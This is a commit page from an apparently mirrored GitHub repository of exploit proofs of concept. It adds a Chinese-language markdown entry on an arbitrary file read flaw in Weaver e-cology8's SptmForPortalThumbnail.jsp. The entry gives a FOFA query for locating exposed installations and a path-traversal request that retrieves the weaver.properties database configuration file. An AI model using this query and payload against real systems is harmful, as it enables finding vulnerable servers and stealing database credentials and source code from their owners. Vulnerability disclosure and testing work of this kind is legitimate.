mirror of
https://github.com/wooluo/POC00.git
synced 2026-07-28 03:45:35 +08:00
6.5更新漏洞
This commit is contained in:
17
泛微OA-E-cology8-SptmForPortalThumbnail.jsp任意文件读取漏洞.md
Normal file
17
泛微OA-E-cology8-SptmForPortalThumbnail.jsp任意文件读取漏洞.md
Normal file
@@ -0,0 +1,17 @@
|
||||
## 泛微OA-E-cology8-SptmForPortalThumbnail.jsp任意文件读取漏洞
|
||||
|
||||
泛微 e-cology8 的 SptmForPortalThumbnail.jsp 文件中的 preview 未进行安全过滤,攻击者可通过该漏洞读取泄露源码、数据库配置文件等等,导致网站处于极度不安全状态。
|
||||
|
||||
## fofa
|
||||
|
||||
```
|
||||
app="泛微-OA(e-cology)"
|
||||
```
|
||||
|
||||
## poc
|
||||
|
||||
```
|
||||
/portal/SptmForPortalThumbnail.jsp?preview=../ecology/WEB-INF/prop/weaver.properties
|
||||
```
|
||||
|
||||

|
||||
Reference in New Issue
Block a user